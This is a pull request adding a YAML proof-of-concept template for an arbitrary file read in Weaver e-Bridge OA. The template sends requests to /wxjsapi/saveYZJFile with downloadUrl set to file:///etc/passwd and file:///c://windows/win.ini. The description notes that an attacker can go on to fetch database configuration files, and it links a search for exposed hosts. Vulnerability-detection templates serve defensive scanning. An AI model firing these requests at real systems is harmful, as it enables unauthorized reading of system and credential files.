### PR TITLE
poc-yaml-ecology-downloadfile

### DIFF
--- a/pocs/ecology-downloadfile.yml
+++ b/pocs/ecology-downloadfile.yml
@@ -1,0 +1,29 @@
+name: poc-yaml-ecology-downloadfile
+rules:
+  - method: GET
+    path: >-
+      /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt
+    headers:
+      user-Agent: >-
+        Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101
+        Firefox/81.0
+    follow_redirects: false
+    expression: >
+      response.status == 200 && response.content_type.contains("json") &&
+      response.body.bcontains(b"id")
+  - method: GET
+    path: >-
+      /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt
+    headers:
+      user-Agent: >-
+        Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101
+        Firefox/81.0
+    follow_redirects: false
+    expression: >
+      response.status == 200 && response.content_type.contains("json") &&
+      response.body.bcontains(b"id")
+detail:
+  author: ifengling
+  Affected Version: "e-Bridge 2018-2019"
+  links:
+    - https://www.cnblogs.com/Yang34/p/13657816.html


### PR DESCRIPTION
泛微0A的这个漏洞利用/wxjsapi/saveYZJFile接口获取filepath,返回数据包内出现了程序的绝对路径,攻击者可以通过返回内容识别程序运行路径从而下载数据库配置文件危害可见。

## 本 poc 是检测什么漏洞的
泛微OA云桥任意文件读取漏洞
## 测试环境
https://fofa.so/result?q=e-Bridge&qbase64=ZS1CcmlkZ2U%3D
## 备注
detail:
  author: ifengling
  Affected Version: "e-Bridge 2018-2019"
  links:
    - https://www.cnblogs.com/Yang34/p/13657816.html